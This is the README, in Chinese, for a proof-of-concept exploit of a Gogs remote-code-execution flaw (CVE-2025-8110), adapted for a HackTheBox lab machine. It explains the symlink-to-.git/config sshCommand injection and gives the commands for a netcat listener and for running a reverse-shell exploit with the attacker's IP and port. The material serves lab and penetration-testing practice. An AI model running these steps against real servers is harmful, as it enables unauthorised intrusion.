免责声明: 此工具仅供教育用途及授权渗透测试使用。仅限用于您已获得明确许可的系统。
这是 zAbuQasem/gogs-CVE-2025-8110 的修改版本,已适配针对 HackTheBox 平台上的 Silentium 机器。原始 PoC 需要调整以处理 Silentium 特定的 Gogs 配置和认证流程。
CVE-2025-8110 是自托管 Git 服务 Gogs 中的一个远程代码执行漏洞。
Gogs 的文件更新 API 端点(PUT /api/v1/repos/.../contents/<file>)未验证目标文件是否为符号链接。经过身份验证的攻击者可以将指向 .git/config 的符号链接推送到仓库中,随后利用该 API 将恶意负载覆盖到该文件上。该负载向 git 配置中注入自定义的 sshCommand,当 Gogs 下次对该仓库执行 SSH 操作时,会在服务端执行该命令,从而导致远程代码执行。
.git/config 的符号链接(malicious_link -> .git/config),然后推送。sshCommand = <反向shell> 的恶意 .git/config。.git/config,在下次 SSH 操作时触发 shell。安装依赖:
pip install -r requirements.txt
启动监听器:
nc -lvnp <PORT>
运行漏洞利用:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
可选——通过 Burp Suite 路由:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| 参数 | 说明 |
|---|
-u | Gogs 基础 URL |
-lh | 你的攻击机 IP(反向 shell 主机) |
-lp | 你的监听端口 |
-un | 你注册的 Gogs 用户名 |
-pw | 你的 Gogs 密码 |
-x | (可选)将流量通过 localhost:8080 上的 Burp Suite 路由 |